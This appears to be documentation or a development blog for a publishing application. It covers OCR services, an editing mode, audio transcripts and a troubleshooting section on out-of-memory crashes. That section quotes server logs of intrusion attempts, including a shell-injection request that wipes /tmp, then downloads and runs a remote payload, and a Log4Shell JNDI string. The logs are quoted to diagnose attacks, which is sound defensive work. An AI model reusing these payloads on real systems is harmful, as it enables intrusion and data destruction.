Writing collections, writings and special pages are not the only things one can encounter on the front page of a solution. A feature called Sideshow places an information panel on the side of the front page. The panel can display results of queries from different databases, lists of writings matching some criteria, news from other sites, advertisements, interactive features, etc.

Picture 1. Commands to fetch the latest news from two different API services.
Picture 2. Sideshow on the front page of a work that uses content list type "Out of ink".
Picture 3. Sideshow on the front page of a work that uses content list type "Plain structure".

To automatically enhance the content of writings, various types of functional embeds may be used. They appear alongside a writing when it is being edited, just like other placeholders. Without much effort, they can be used to add a list of the writing's subheadings, a list of similar writings, a list of contributors, a live news section with subheadings, etc.

At an earlier stage, the ABBYY Cloud OCR SDK was going to be used for text recognition from image scans. It worked so reliably for all images containing mainly text that it was already in production, but at some point it was simply removed from ABBYY's offering, although previous customers can still use it.

After trying out many alternatives, two have been chosen: Google's Vision API is the primary option and, if it is not available (e.g. no API key has been set), OCRSpace is used instead. Google's Vision API is free up to 1000 uses per month; it requires a credit card, but there is no charge as long as usage stays below that level. OCRSpace is free continuously, but image files are limited to one megabyte unless you buy a monthly subscription. The Google API key can be restricted, for example so that it works only with the Vision API and only for requests from a specific website.
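The fallback order described above can be sketched roughly as follows. This is only an illustration, not the application's actual code: the function name, the provider labels and the exact byte count used for "one megabyte" are assumptions.

```python
from typing import Optional

# "One megabyte" in the text; the exact byte count is an assumption.
OCRSPACE_FREE_LIMIT_BYTES = 1_000_000


def choose_ocr_provider(google_api_key: Optional[str],
                        image_size_bytes: int,
                        ocrspace_subscription: bool = False) -> Optional[str]:
    """Return the name of the OCR service to try, or None if neither fits."""
    # Google's Vision API is preferred whenever an API key has been set.
    if google_api_key:
        return "google-vision"
    # OCRSpace is the fallback; without a subscription the file size is limited.
    if ocrspace_subscription or image_size_bytes <= OCRSPACE_FREE_LIMIT_BYTES:
        return "ocrspace"
    return None
```

A caller would check the returned label and, when it is None, tell the user that the image is too large for the free OCRSpace tier.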

Google's Vision API can be used to e.g. quickly and easily read old receipts. Texts from books, magazines and websites are also very likely to be recognised in a very usable way.

Other alternatives that have been tried include the services of Amazon and Microsoft, as well as api4ai, but pricing and deployment issues made Google's Vision API the preferred option. Microsoft's service might have been a good choice, but when used via Eden AI it would often fail to see anything where "everyone else" recognized the text just fine. On the other hand, the ABBYY OCR SDK could easily be made to produce extra letter artifacts (e.g. "anomalies apparent during visual representation"). An attempt to use Microsoft's Azure AI Vision directly ended when the service appeared to require organization-level approval for account access, or something to that effect.

OCR functionality is available both in the "particular browsing" view, when an image is being viewed in the "Large preview" modal window, and in the item preview panel of the adequates view, when an image or multi-image is selected. In the first case, the detected text can be placed on the clipboard by clicking it. Alternatively, one can hold down the Ctrl key while selecting part of the resulting text in order to do something with it, such as copying it or using it to search the web. In the second case, the resulting text is automatically appended to the item's textual content. Recognizing text from an image is usually fast with the Google Vision API, taking about a second.

Text recognition from book pages (earlier tests)

ABBYY's text recognition leaves little to complain about when it is applied to images containing scanned text or screenshots of web pages. The languages in which text is to be found can be given as parameters.

444 VIL THE MECHANISM OF TIME-BINDING of it can be found by analysis practically everywhere. Our problem is to analyse the general case. Let us follow up roughly the process. We assume, for instance, an hypothetical case of an ideal observer who observes correctly and gives an impersonal, unbiased account of what he has observed. Let us assume that the happenings he has observed appeared as: O, and then a new happening ( occurred. At this level of observation, no speaking can be done, and, therefore, I use various fanciful symbols, and not words. The observer then gives a description of the above happenings, let us say a, b, c, d, . . . , x; then he makes an inference from these descriptions and reaches a con- clusion or forms a judgement A about these facts. Wc assume that facts unknown to him, which always exist, are not important in this case. Let us assume, also, that his conclusion seems correct and that the action A" which this conclusion motivates is appropriate. Obviously, we deal with at least three different levels of abstractions: the seen, experienced ., lower order abstractions (un-spcakable) ; then the descriptive level, and, finally, the inferential levels. Let us assume now another individual, Smiths ignorant of struc- ture or the orders of abstractions, of consciousness of abstracting, of s.r.; a politician or a preacher, let us say, a person who habitually iden- tifies, confuses his orders, uses inferential language for descriptions, and rather makes a business out of it. Let us assume that Smith, observes the 'same happenings’. He would witness the happenings O, |, ..... and the happening would appear new to him. The happenings O, be would describe in the form a, b, c, d, . . . , from which fewer descriptions he would form a judgement, reach a conclu- sion, B; which means that he would pass to another order of abstrac- tions. 
When the new happening occurs, he handles it with an already formed opinion B, and so his description of the happening ( is coloured by his older s.r and no longer the x of the ideal observer, but B(x) --- y. His description of ‘facts’ would not appear as the a, b, c, d, . . . , x, of the ideal observer but a, b, c, d,..., B(x) = y. Next he would abstract on a higher level, form a new judgement, about ‘facts’ a, b, c, d, . . . , B(x) =y, let us say, C. We see how the semantic error was produced. The happenings appeared the ‘same’, yet the unconscious identification of levels brought finally an entirely different conclusion to motivate a quite different action, A diagram will make this structurally clearer, as it is very difficult to explain this by words alone. On the Structural Differential it is shown without difficulty.

HIGHER ORDER ABSTRACTIONS 445 Seen happenings (un- IDEAL OBSERVER SMITH] speakable) (First order abstrac- tions) ............. Ik-5 .X Description III! I I I! I ( Second order abstrac- tions) ............. a, b, c, d, ... x a, b, c, d,... B(x)=y Inferences, conclusions, iqB and what not. I (Third order abstrac- tions) ............. A c Creeds and other se- I I mantic reactions.... A' c I Action A9 e Let us illustrate the foregoing with two clinical examples. In one case, a young boy persistently did not get up in the morning. In another case, a boy persistently took money from his mother’s pocketbook. In both cases, the actions were undesirable. In both cases, the parents unconsciously identified the levels, x was identified with B(x), and con- fused their orders of abstractions. In the first case, they concluded that the boy was lazy; in the second, that the boy was a thief. The parents, through semantic identification, read these inferences into every new ‘description’ of forthcoming facts, so that the parents’ new ‘facts’ became more and more semantically distorted and coloured in evaluation, and their actions more and more detrimental to all concerned. The general conditions in both families became continually worse, until the reading of inferences into descriptions by the ignorant parents produced a semantic background in the boys of driving them to murderous intents. A psychiatrist dealt with the problem as shown in the diagram of the ideal observer. The net result was that the one boy was not ‘lazy’, nor the other a ‘thief’, but that both were ill. After medical attention, of which the first step was to clarify the symbolic semantic situation, though not in such a general way as given here, all went smoothly. Two families were saved from crime and wreck. 
I may give another example out of a long list which it is unnecessary for our purpose to analyse, because as soon as the ‘consciousness of abstracting’ is acquired, the avoidance of these inherent semantic dif- ficulties becomes automatic. In a common fallacy of 'Petitio

Text recognition from photos (earlier tests)

Photographs of places that may be nostalgic or very significant to someone are not always welcome in a city-specific online discussion group. Viewers may not get the chance to relate their feelings about the present and their memories of the past to photographs that feel intrusive, and whose content and mood may not match their personality at all. Hopefully, when the emphasis is not on location or time, the response is less reluctant. These photographs, taken a couple of decades ago, can therefore well be used to demonstrate text recognition from photographs.

However, the results of text recognition from photographs turn out to be of limited use, which gives the feeling that training some artificial intelligence component might be required. The Cloudinary OCR add-on used here actually relies on the Google Vision API and, according to its documentation, accepts no parameters to guide text recognition when the text consists only of Latin characters, i.e. the analysis results are the best available. The original images used in the analysis are 2015 x 1512 pixels. Google's Vision API also returns information about where in the image each piece of text is found, which Cloudinary uses to automatically highlight the parts of the image where the analysis indicates that text is present. Discussions have been held with Cloudinary about special pricing of the OCR functionality for users of this publishing application (available on request).

BAR & CAFE, NESS, Billy, KID, PUB, matkavekka, FINN, Veld, verka, MATKATOIMISTO, Malsta, sites, GidenApala, Vedka
HELIOS, LAPPENANNAN KAIHDIN, MARKIISI, Tjärebor, Puh. 4150 405, Lomat meilta, KAIED MARKI, AVONNA, RKIISI mattin
PI, Maksuilinen Alueella, lippuautomaatti, KANGAS-KULMA, + HELIOS, DIE HOU, P., KAMERAY-DIGIKAMERAT-ART-TAR, KANGAS-KU, MARKISE, HELIOS, FUDW DENUR S
KAUPPAKESKO, RMAD, OMEGA, SUNINEN, HLAT S 685 ANTIT, COFFEE HOUSE
Tukip, saile, NISSEN, CO ECA, ©HairStore, SUOMALAINEN
Billy JOKA PAIVA, -03, OMALAINEN KIRJAKAUPPA, Hemter, Z-SSEN, elisa •HairStore, OMALAINEN, DZAIAISS
SELES, NATUMA, NATUMAS, al are-lanp
PUB, matkavekka Vekka, Matkahuolto, FINNRIR, opRa, POCICE

The "spacious" text editing mode attempts to emulate pages placed side by side and underneath each other by using resizable text areas. Text flows automatically through as many text areas as necessary, both while it is being typed and after the text areas are resized. The arrow keys on the keyboard can be used to move from one text area to another. If images or other attachments are attached to the writing, they remain unchanged, even though this mode does not display anything to indicate that they are attached.

Spacious mode has a restriction, at least for now: the font must be monospaced (fixed width), and the writing cannot contain formatting or included images (they will be removed). Also, the text cannot be copied with the mouse in such a way that the contents of more than one text area are copied at a time. At the bottom of the first text area there is a resize button that adjusts the size of all text areas, e.g. to have two wide and tall text areas next to each other, three oblong text areas next to each other, or small text areas in a grid pattern. Excess text areas are deleted automatically and, if more are needed to accommodate the text, new ones are added. Adjusting the size of the browser window gives more control over how many text areas fit side by side. Those that do not fit on one row start a new row of text areas.
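Because the font is monospaced, the way text flows from one text area to the next can be illustrated with a simple calculation. The sketch below is not the application's implementation; the function name and the idea of measuring a text area as a number of columns and rows are assumptions made for illustration.

```python
import textwrap


def flow_text(text: str, cols: int, rows: int) -> list[list[str]]:
    """Split text into text areas that each hold `rows` lines of `cols` characters."""
    lines: list[str] = []
    for paragraph in text.split("\n"):
        # wrap() returns an empty list for an empty paragraph; keep it as a blank line.
        lines.extend(textwrap.wrap(paragraph, width=cols) or [""])
    # Every group of `rows` lines fills one text area; areas are added as needed.
    return [lines[i:i + rows] for i in range(0, len(lines), rows)]
```

Resizing corresponds to calling the function again with new dimensions: larger areas yield fewer of them, smaller areas yield more.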

In spacious mode, a text paragraph can be moved forwards or backwards by placing the cursor in the paragraph and pressing the up or down arrow key together with the Ctrl key. The paragraph then swaps places with the adjacent one. This strengthens the feeling that the text is continuous, as the paragraph moves between text areas as well as within the same text area.
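The swap itself is a small list operation. The following is a minimal sketch under the assumption that the text is held as a list of paragraphs; the function name and the convention of -1 for up and +1 for down are hypothetical.

```python
def move_paragraph(paragraphs: list[str], index: int, direction: int) -> list[str]:
    """Swap the paragraph at `index` with its neighbour (-1 = up, +1 = down)."""
    target = index + direction
    in_range = 0 <= index < len(paragraphs) and 0 <= target < len(paragraphs)
    if direction not in (-1, 1) or not in_range:
        # Nothing to swap with at the edges of the text: return an unchanged copy.
        return list(paragraphs)
    result = list(paragraphs)
    result[index], result[target] = result[target], result[index]
    return result
```

After the swap, the text would be flowed through the text areas again, which is why a moved paragraph can end up in a different text area.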

Even when running on a single server, KotvaWrite Stories could easily be left for a month without any special monitoring, provided the number of concurrent users is not overly high. An exception may be the mysterious cases where the memory and disk usage of a virtual server (Linux) momentarily rise quickly and stay high for some time. That could crash the application server on which the publishing application is installed. The consequences may not be too critical, as any unfinished database and file saves can/should be fixed and cleaned up semi-automatically, after which a simple restart of the application server might be sufficient to get things back to normal. However, if a large number of hacking attempts are involved, some OS-level resources may be exhausted, such as the number of open files ("files that are currently being reviewed or modified").

By looking through the log file of the kernel of a Linux operating system in use, one may notice that the Java process has run out of memory on e.g. 15.10.2022, 18.8.2022 and 5.8.2022:

[Sat Oct 15 23:42:37 2022] Out of memory: Killed process 1295081 (java)

[Thu Aug 18 11:45:30 2022] Out of memory: Killed process 272984 (java)

[Fri Aug 5 06:11:36 2022] Out of memory: Killed process 4157049 (java)
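Lines like the ones above can be picked out of a kernel log programmatically. The sketch below assumes the timestamp format shown in these excerpts and an English locale for the day and month names; the function name is hypothetical.

```python
import re
from datetime import datetime

# Matches kernel log lines of the form shown above.
OOM_RE = re.compile(
    r"^\[(?P<when>[^\]]+)\] Out of memory: Killed process (?P<pid>\d+) \((?P<name>[^)]+)\)"
)


def parse_oom_line(line: str):
    """Return (timestamp, pid, process name) for an OOM kill line, else None."""
    match = OOM_RE.match(line.strip())
    if not match:
        return None
    # Assumes English day and month abbreviations, as in the excerpts above.
    when = datetime.strptime(match.group("when"), "%a %b %d %H:%M:%S %Y")
    return when, int(match.group("pid")), match.group("name")
```

The timestamps obtained this way can then be compared with the timestamps in other logs when looking for events that happened just before the memory ran out.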

To be a bit more specific, the application server on which the publishing application is installed is actually a Java servlet container running on a Java Virtual Machine (JVM), and the limits within which the associated Java process may use memory are configurable. Stress tests have shown that certain memory configurations are enough - until for some reason they are not.

Two APM (Application Performance Monitoring) agents are installed separately on the Linux operating system that hosts the publishing application. They collect information in real time about, e.g., both the operating system and the publishing application, and this information can then be viewed in a variety of ways in the web interfaces of the APM services (for example New Relic and Datadog). In these out-of-memory cases, one thing has always held true: the amount of web traffic has not been a significant factor at the time when virtual process usage has grown by, e.g., a factor of 20 and a strikingly large amount of disk activity has occurred within a short period. At such times, it is not surprising that database queries may take more than ten seconds to run instead of the normal few milliseconds.

In addition, an external service such as Papertrail can be used to collect log data from several sources, such as the application server and the operating system, so that the logs do not have to be read in a Linux shell but can be viewed through a web interface. Browsing the gathered logs has given rise to an impression of hacker activity. It seems that someone, perhaps some would-be hackers, has done a lot of crude experimentation to get through the defences of the operating system, the application server and the publishing application. This has been ongoing throughout 2022. Not once has there been an attempt at a Distributed Denial of Service (DDoS) attack; instead there has been, e.g., slow experimentation with usernames and passwords spread over a long period of time, with no more than a few dozen attempts per minute. That means every minute, every hour, every day and every month. Couldn't they just do something valid and successful the first time?

Contemplating the timing of the out-of-memory errors tends to lead to the observation that some of the hacking attempts happen just seconds before the memory runs out. But could the errors also have something to do with not having dedicated servers? On a so-called virtual server, the same physical hardware resources are shared by more than one data centre client. Sometimes the actual hardware can cause failures, so the cause of the problems could also be something other than what can be seen in the available logs and dashboards. However, the data centre service provider said that there was no anomaly to report at the time of the problematic out-of-memory events.

Normally, when using Hetzner virtual servers, one CPX21 instance with 4 GB of memory and 3 vCPUs has been enough for "basic use". There are, however, other possible explanations for out-of-memory errors and other strangely anomalous problems than those already mentioned. For example, the application server might be far behind the latest version, and the same could apply to Java, the programming language used on the server side. There are separate settings for when and how the application server and Java clean up memory to remove things that are no longer needed, but they are generally left at their defaults. All of this is quite manageable, but may require a lot of monitoring and testing to detect borderline cases.

The remainder of this article contains observations about one particular out-of-memory event. And if this is where one can send greetings to the administrators of the publishing application, it should be mentioned that some additional configuration could ensure that the original IP addresses, rather than 127.0.0.1, appear in the application server logs. Then again, might the General Data Protection Regulation (GDPR) have something to say about this?

Plenty of login attempts in the logfile /var/log/messages:

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Invalid user ktx from 5.51.84.107 port 55716

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Received disconnect from 5.51.84.107 port 55716:11: Bye Bye [preauth]

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Disconnected from invalid user ktx 5.51.84.107 port 55716 [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Invalid user postgres from 195.88.87.19 port 53396

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Received disconnect from 195.88.87.19 port 53396:11: Bye Bye [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Disconnected from invalid user postgres 195.88.87.19 port 53396 [preauth]

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Invalid user Test from 179.60.147.99 port 37284

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Connection closed by invalid user Test 179.60.147.99 port 37284 [preauth]

Oct 15 23:13:34 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Invalid user support from 193.106.191.50 port 49598

Oct 15 23:13:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Connection closed by invalid user support 193.106.191.50 port 49598 [preauth]

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Invalid user Test from 179.60.147.99 port 55870

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Connection closed by invalid user Test 179.60.147.99 port 55870 [preauth]

Oct 15 23:39:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2491284]: Received disconnect from 92.255.85.69 port 26930:11: Bye Bye [preauth]
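To get an overview of entries like these, the "Invalid user" lines can be counted per source address. This is a minimal sketch that assumes the sshd message format seen in the excerpt above; the function name is hypothetical.

```python
import re
from collections import Counter

# Matches the "Invalid user <name> from <address> port <n>" messages of sshd.
INVALID_USER_RE = re.compile(
    r"sshd\[\d+\]: Invalid user (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def count_invalid_logins(lines) -> Counter:
    """Count failed login attempts with unknown usernames per source address."""
    counts: Counter = Counter()
    for line in lines:
        match = INVALID_USER_RE.search(line)
        if match:
            counts[match.group("ip")] += 1
    return counts
```

Calling `count_invalid_logins(open("/var/log/messages"))` and then `most_common(10)` on the result would list the ten busiest addresses.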

A few suspicious log lines here and there in the application server log file localhost_access_log:

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "GET /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST / HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:21:47 +0200] "GET /view.jsp?solutionid=539'A=0&writingid=12501 HTTP/1.1" 200 13477

127.0.0.1 - - [15/Oct/2022:23:21:52 +0200] "GET /view.jsp?solutionid=539&writingid=12501'A=0 HTTP/1.1" 200 15507

A few hundred variations of attempts to access a web interface that is not installed:

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 782

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 404 783

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 778

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 772

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 784

Trying to gain access by typing parameters and guessing addresses:

127.0.0.1 - - [15/Oct/2022:16:18:21 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:18:25 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.pl HTTP/1.1" 404 759

195.96.137.4 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.jsa HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 773

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /infos.php HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 790

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 791

82.99.217.202 - - [15/Oct/2022:07:52:03 +0200] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F218.24.200.243%3A8066%2FTomcatBypass%2FY3D HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:01:29:44 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 787
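Requests such as those above can be flagged automatically by looking for telltale fragments in the requested address. The sketch below is only an illustration: the marker list and its labels are assumptions drawn from the excerpts in this article, not a complete rule set.

```python
import re
from urllib.parse import unquote

# Extracts the method, requested address and status code from an access log line.
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Illustrative markers only; checked in this order.
PROBE_MARKERS = {
    "/.env": "environment file probe",
    "${jndi:": "JNDI lookup injection (Log4Shell-style)",
    "/shell?": "shell command injection",
    "wlwmanifest.xml": "WordPress probe",
    ".php": "PHP page probe",
}


def classify_request(log_line: str):
    """Return a label for a suspicious request, or None if nothing matches."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # Decode %xx escapes so that encoded payloads are recognised too.
    target = unquote(match.group("target"))
    for marker, label in PROBE_MARKERS.items():
        if marker in target:
            return label
    return None
```

Note that a status code of 200 in such a line does not by itself mean that the attempt succeeded; the front page is simply returned for any query string.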

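The second log on the application server (catalina) sometimes contains traces of experiments with imaginary weaknesses. In the entries below, the leading bytes 0x16 0x03 0x01 suggest a TLS handshake sent to the plain HTTP port: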

14-Oct-2022 04:01:50.622 INFO [http-nio2-8080-exec-21] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

       java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0x01;0x993Z0x15e}0x005/0x050x010x00...]. HTTP method names must be tokens

15-Oct-2022 14:21:12.637 INFO [http-nio2-8080-exec-6] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

   java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0xe40x920x88{#{*<0xc80xec0xfc}l0x820x85\0xcc0x1a0xc0/0x0050xc00x000x00...]. HTTP method names must be tokens

Motivation, timing, etc., can be reasons for not starting to write at the very moment when, while browsing the web, one notices something worth capturing that may be of at least some use. In such a case, a saved screenshot together with the address of the web page should be enough to remind one of what one was about to write about.

An Android application has been developed on the Minimum Viable Product principle, intended for use only on Android tablets running at least Android 11. The application acts as a receiver for the browser's share function, through which it receives information about the web page open in the browser. Based on this information, the application can open the same page inside itself, so that the user can then take as many screenshots of it as needed. The screenshots are stored in the Pictures directory of the device, and when sent to the instance of the publishing application they are stored in the image container Quick saves (every user has one by default). The aim is to keep the transferred images at as high a resolution as possible, in order to allow for any cropping that may be necessary at a later stage.

Without using a separate application, one can take a screenshot of the page behind a link by, e.g., first adding the link to an adequate and then selecting the "Take a screenshot" function (see the "Screenshots" section of the instructions), or by taking a screenshot using the functionality of the mobile device or its browser.

On Android, one can take a screenshot of a web page, even a full page, by first typing "chrome://flags" in the address bar, selecting "screenshots for android v2" from the numerous options, and setting it to "enabled". This will enable the "long screenshot" function in the browser, which will save the screenshot taken on the device to a file (to the directory "DCIM/Screenshots", the name of the screenshot file will be formed according to the standard format).

On iPad, one can take a full-page or partial screenshot of a web page by first pressing the Home and Volume buttons briefly, and then choosing between a screen and a full-page screenshot. Saving produces a PDF file for a full-page screenshot, otherwise a PNG file. Both options allow cropping. This works equally well in e.g. Safari and Edge. The title of the web page is automatically included in the image file name.

The Edge browser, which comes standard with Windows 11, has a basic web capture feature that lets one take a full-page screenshot of a web page, or crop it as desired. The image file format is always JPEG. Alternatively, one can install a browser extension such as FireShot.

To export pages and annotations from PDF files as image files, there are PDF reader applications that can save a page directly as an image file to a selected location using the Share function. Sometimes they cannot produce a very high resolution image, so a separate application designed specifically for this purpose, perhaps costing a couple of euros, may be a much better option (e.g. selectable image size, pages, file type, etc.). Once the images have been created from the PDF file, the importing view of the publishing application, opened in a browser on the same device, can be used to import the saved images for use in a solution or an adequateset of the publishing application.

Just as the publishing application tries to avoid burdening the user's memory, the intention is also to avoid burdens related to the cost, manageability or restrictions of external services. While some external services are needed only during the content production phase, some map services are in partial use continuously if some public domain works contain interactive maps, and they are not always free of charge without limits. To some extent, this is also a business decision, i.e. what can be promised to a client of the publishing application, etc.

Using maps in your writing is a spectacular way to clarify location. An external API is used for geocoding, i.e. for converting a given location, such as a city name, into map coordinates. There are a few different map services to choose from.

Third-party software components are used to display maps, and initial tryouts in implementing them have given rise to a wide range of ideas on how to let the user make use of maps. Possibilities include stylistically different map tiles, elements added on top of the map, and route guidance. Another consideration is that the use of map services may be subject to a fee beyond a certain level of use, and that the number of requests per time period may be limited. The user must obtain a user account for the map service API by registering and then locate the required API key, which is placed in the user-specific settings of the publishing application.

Other particulars under consideration include podcasts, for which there are a few dozen hosting services that offer a web-based audio player that can be embedded on a web page. Should all of these be made available, or just some of them? Can such a decision be made more than once? In the meantime, plain audio files can be used. Transcripts of audio files are also an experimental feature, perhaps mainly because they require a bit of extra effort on the part of the user the first time.

It's easier to browse and understand audio recordings when one can simultaneously follow as text what is being said, what was said before and what will be said after a moment. Related to this there is the WebVTT (Web Video Text Tracks Format) standard, which, despite its name, also works with audio files and can be characterised as the representation of the text used in synchronisation with other media such as audio or video.

Making a VTT file from an audio recording is a matter of transcription, i.e. turning speech into text. There are several online applications for this purpose, but not all of them recognise the Finnish language. They vary widely in pricing, some offer a certain amount of free transcribing time per month, and they are very likely to produce results of differing quality.

One could use Google's Speech-to-Text API, which can be accessed directly from the Google Cloud console through a graphical user interface. Basically, an audio file is given as input, a few choices affecting quality are made, and after a short wait a download option becomes available for retrieving an SRT file containing the transcribed audio. SRT files are almost identical to WebVTT files, both being human- and machine-readable text files. However, an SRT file needs to be converted to a VTT file before it can be used. This conversion requires a separate application, which can be a Windows application or, alternatively, any of the many conversion services available on the web (try searching for "convert srt to vtt").
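Since the two formats are so close, the conversion can also be done with a few lines of code. The sketch below covers only the basic differences (the "WEBVTT" header line and a dot instead of a comma in the timestamps) and ignores SRT styling tags; the function name is hypothetical.

```python
import re

# SRT timestamps use a comma before the milliseconds, WebVTT uses a dot.
TIMESTAMP_RE = re.compile(r"(\d{2}:\d{2}:\d{2}),(\d{3})")


def srt_to_vtt(srt_text: str) -> str:
    """Convert the text of an SRT file to WebVTT text."""
    lines = srt_text.lstrip("\ufeff").splitlines()  # drop a possible byte order mark
    converted = [
        # Only timing lines contain "-->"; cue text is left untouched.
        TIMESTAMP_RE.sub(r"\1.\2", line) if "-->" in line else line
        for line in lines
    ]
    return "WEBVTT\n\n" + "\n".join(converted).strip() + "\n"
```

The cue numbers of the SRT file are kept as they are, since WebVTT allows a cue identifier line before each timing line.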

The user does not need to give the publishing application any input other than the URL of the audio file and the URL of the VTT file. These are used to generate an audio player with an interactive transcript displayed below it. Interactivity here means that clicking a part of the transcript moves the player to the position from which the audio continues to play. As the listener progresses through the audio, the transcript indicates which part of the audio is currently being played.
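The logic behind such a transcript is small: timestamps are turned into seconds, a click seeks the player to the start time of the clicked cue, and the current playback position decides which cue is highlighted. The sketch below shows the lookup part only; the function names are hypothetical and the cues are assumed to be sorted and non-overlapping.

```python
from bisect import bisect_right
from typing import Optional


def parse_vtt_time(stamp: str) -> float:
    """Convert "hh:mm:ss.ttt" or "mm:ss.ttt" to seconds."""
    parts = stamp.split(":")
    seconds = float(parts[-1])
    minutes = int(parts[-2])
    hours = int(parts[-3]) if len(parts) == 3 else 0
    return hours * 3600 + minutes * 60 + seconds


def active_cue_index(cue_starts: list[float], cue_ends: list[float],
                     position: float) -> Optional[int]:
    """Return the index of the cue playing at `position`, or None between cues."""
    # Find the last cue that starts at or before the playback position.
    i = bisect_right(cue_starts, position) - 1
    if i >= 0 and position < cue_ends[i]:
        return i
    return None
```

Seeking on click is then just a matter of setting the player position to `cue_starts[i]` of the clicked cue.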

The VTT file must be located in a place that allows such files to be distributed either everywhere or to the server used by the publishing application. It is recommended that both the audio file and the VTT file are placed on the CDN Storage provided by the CDN service you are already required to use, as the relevant Cross-Origin Resource Sharing (CORS) settings are easily found in its configuration.

Enabling the transcript feature requires turning on the experimental functions in the user-specific settings. Audio-like particulars that have been created remain intact even after the experimental functions are turned off, meaning that they will also, e.g., be included in backups. In practice, turning the experimental functions on or off just shows or hides some interface elements.

When there are, e.g., several parts to a published series and a user has plenty of other published works, it may be clearer to let a stacked presentation indicate that there are several more solutions for a reader to select. In practice, this is done by adding a "#" character (without a space) after the group name in the solutions' settings, followed by a number. Then, on the Profile tab of the user preferences, the information specifying the stack is added to the "Stackable groups" text field, following the syntax "group name#stack number#stack name#stack title". The last two are optional, but the group name and stack number must be included. If there is more than one stack, they are separated by a semicolon.
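The "Stackable groups" field described above (a group name, a number and two optional fields, with entries separated by semicolons) could be parsed along the following lines. This is a sketch for illustration only; the class, field and function names are assumptions, not the application's own.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Stack:
    group: str                   # group name, required
    number: int                  # number following the "#", required
    name: Optional[str] = None   # optional third field
    title: Optional[str] = None  # optional fourth field


def parse_stackable_groups(value: str) -> list[Stack]:
    """Parse semicolon-separated entries of "#"-separated fields."""
    stacks = []
    for entry in value.split(";"):
        entry = entry.strip()
        if not entry:
            continue
        # Split at most three times so that a title may itself contain "#".
        fields = entry.split("#", 3)
        if len(fields) < 2 or not fields[0] or not fields[1].isdigit():
            raise ValueError(f"group name and number are required: {entry!r}")
        name = fields[2] if len(fields) > 2 and fields[2] else None
        title = fields[3] if len(fields) > 3 and fields[3] else None
        stacks.append(Stack(fields[0], int(fields[1]), name, title))
    return stacks
```

For example, the hypothetical value "Novels#1#series#My series;Essays#2" would yield two stacks, the second one without a name or title.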

Clicking on a stack in a solution index will show the solutions in that stack, arranged similarly, without changing the web address.

If you later decide that you don't want to use a certain stack, it is not necessary to edit the group names in the settings of each solution, as it is sufficient to remove the stack definition from the user settings. Any additions to the group names, such as "#1", will then simply remain unused.

One of the things that makes this experimental is that many browsers do not apply antialiasing to images that have been rotated, which makes them look rather coarse, especially images containing text [correction: CSS styling with "transform-style: preserve-3d;" fixes the problem].

Project files

